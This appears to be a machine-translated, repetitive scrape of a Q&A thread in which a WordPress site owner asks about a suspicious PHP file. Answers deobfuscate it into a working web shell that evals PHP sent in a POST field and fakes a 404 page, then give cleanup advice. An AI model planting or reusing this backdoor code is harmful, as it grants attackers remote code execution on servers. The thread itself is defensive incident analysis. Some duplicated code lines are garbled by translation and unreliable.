Php 托管恶意文件的目的
嗨,我在服务器上有恶意的php文件,我在我的计算机上下载了该文件。此文件包含小的恶意代码并试图执行eval命令。我不知道那个文件对我的服务器有什么影响。如果有人能用这个代码回复我,请Php 托管恶意文件的目的,php,eval,Php,Eval,嗨,我在服务器上有恶意的php文件,我在我的计算机上下载了该文件。此文件包含小的恶意代码并试图执行eval命令。我不知道那个文件对我的服务器有什么影响。如果有人能用这个代码回复我,请 $q22=“fo\\@5HL[\r.S4awj\t)n`x}”UZ\$gr(+JO2i*I;3XCvBk>m,NzEc_6qD?9PYhuV:bl | WK&Q=#y~/t!\neAp7]{M1Fd%0-^8GR这段代码将执行通过POST请求发送到页面的任何PHP代码,在mc5812ae code>字段中 这是对$
$q22=“fo\\@5HL[\r.S4awj\t)n`x}”UZ\$gr(+JO2i*I;3XCvBk>m,NzEc_6qD?9PYhuV:bl | WK&Q=#y~/t!\neAp7]{M1Fd%0-^8GR这段代码将执行通过POST
请求发送到页面的任何PHP代码,在mc5812ae code>字段中
这是对$q22
的串联进行求值后的代码:
$GLOBALS['owyeq61'] = ${'_POST'};
$GLOBALS['tmiok36'] = 'header';
if (!empty($GLOBALS['owyeq61']['mc589a12e'])) {
eval($GLOBALS['owyeq61']['mc589a12e']);
}
$GLOBALS['tmiok36']('HTTP/1.0 404 Not Found');
echo '<h1>404 Not Found</h1>
The page that you have requested could not be found.';
$GLOBALS['owyeq61']=${''u POST'};
$GLOBALS['tmiok36']='header';
如果(!empty($GLOBALS['owyeq61']['mc589a12e'])){
eval($GLOBALS['owyeq61']['mc589a12e']);
}
$GLOBALS['tmiok36']('HTTP/1.0 404未找到');
找不到回音'404
找不到您请求的页面。“;
这段代码将在mc589a12e
字段中执行通过POST
请求发送到页面的任何PHP代码
这是对$q22
的串联进行求值后的代码:
$GLOBALS['owyeq61'] = ${'_POST'};
$GLOBALS['tmiok36'] = 'header';
if (!empty($GLOBALS['owyeq61']['mc589a12e'])) {
eval($GLOBALS['owyeq61']['mc589a12e']);
}
$GLOBALS['tmiok36']('HTTP/1.0 404 Not Found');
echo '<h1>404 Not Found</h1>
The page that you have requested could not be found.';
$GLOBALS['owyeq61']=${''u POST'};
$GLOBALS['tmiok36']='header';
如果(!empty($GLOBALS['owyeq61']['mc589a12e'])){
eval($GLOBALS['owyeq61']['mc589a12e']);
}
$GLOBALS['tmiok36']('HTTP/1.0 404未找到');
找不到回音'404
找不到您请求的页面。“;
我在沙箱模式下运行代码
$test['owyeq61'] = $q22[50].$q22[56].$q22[30].$q22[10].$q22[97];
// return POST
$test['tmiok36'] = $q22[58].$q22[77].$q22[12].$q22[86].$q22[77].$q22[26];
// return Header
$q22[95].$q22[58].$q22[84].$q22[43].$q22[11].$q22[88].$q22[11].$q22[34].$q22[ 46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86].$q22[95].$q22[73].$q22[58].$q22[84].$q22[43].$q22[8].$q22[76].$q22[97].$q22[58].$q22[77].$q22[34].$q22[79].$q22[12].$q22[25].$q22[77].$q22[34].$q22[74].$q22[58].$q22[12].$q22[74].$q22[34].$q22[71].$q22[1].$q22[59].$q22[34].$q22[58].$q22[12].$q22[40].$q22[77].$q22[34].$q22[26].$q22[77].$q22[52].$q22[59].$q22[77].$q22[96].$q22[74].$q22[77].$q22[86].$q22[34].$q22[49].$q22[1].$q22[59].$q22[63].$q22[86].$q22[34].$q22[17].$q22[1].$q22[74].$q22[34].$q22[62].$q22[77].$q22[34].$q22[0].$q22[1].$q22[59].$q22[17].$q22[86].$q22[9].$q22[8].$q22[76];
// returns 404 Page not found
但是在评估中,它会变得很棘手。它会查找全局头mc589a12e
它不在代码中,因此我认为它在wordpress中的某个地方设置了,脚本会将此全局头重写为HTTP/1.0 404 not Found
。可能是为了绕过安全检查
不用说,从服务器上删除此文件并更新系统/检查用户/写入权限
也许用这个作为你的检查清单
我在沙箱模式下运行代码
$test['owyeq61'] = $q22[50].$q22[56].$q22[30].$q22[10].$q22[97];
// return POST
$test['tmiok36'] = $q22[58].$q22[77].$q22[12].$q22[86].$q22[77].$q22[26];
// return Header
$q22[95].$q22[58].$q22[84].$q22[43].$q22[11].$q22[88].$q22[11].$q22[34].$q22[ 46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86].$q22[95].$q22[73].$q22[58].$q22[84].$q22[43].$q22[8].$q22[76].$q22[97].$q22[58].$q22[77].$q22[34].$q22[79].$q22[12].$q22[25].$q22[77].$q22[34].$q22[74].$q22[58].$q22[12].$q22[74].$q22[34].$q22[71].$q22[1].$q22[59].$q22[34].$q22[58].$q22[12].$q22[40].$q22[77].$q22[34].$q22[26].$q22[77].$q22[52].$q22[59].$q22[77].$q22[96].$q22[74].$q22[77].$q22[86].$q22[34].$q22[49].$q22[1].$q22[59].$q22[63].$q22[86].$q22[34].$q22[17].$q22[1].$q22[74].$q22[34].$q22[62].$q22[77].$q22[34].$q22[0].$q22[1].$q22[59].$q22[17].$q22[86].$q22[9].$q22[8].$q22[76];
// returns 404 Page not found
但是在评估中,它会变得很棘手。它会查找全局头mc589a12e
它不在代码中,因此我认为它在wordpress中的某个地方设置了,脚本会将此全局头重写为HTTP/1.0 404 not Found
。可能是为了绕过安全检查
不用说,从服务器上删除此文件并更新系统/检查用户/写入权限
也许用这个作为你的检查清单
我会从主机上删除该站点,删除数据库,将您的本地版本更新为最新的Wordpress和插件版本,更改任何用户名/密码(在主机上和Wordpress管理员上,因为安全总比抱歉好)然后再上传一次。另外,你应该谷歌看看是否有已知的插件存在安全问题。这不是第一次一个蹩脚的插件造成这样的问题。除此之外,我们对此无能为力。我会从主机上删除该网站,删除数据库,将你的本地版本更新为最新的Wordpress和插件版本,更改任何用户名/密码(在主机和Wordpress管理员上,因为安全总比抱歉好)并再次上传。此外,你应该通过谷歌查看是否有已知的插件存在安全问题。这不是第一次一个蹩脚的插件导致这样的问题。除此之外,我们对此无能为力。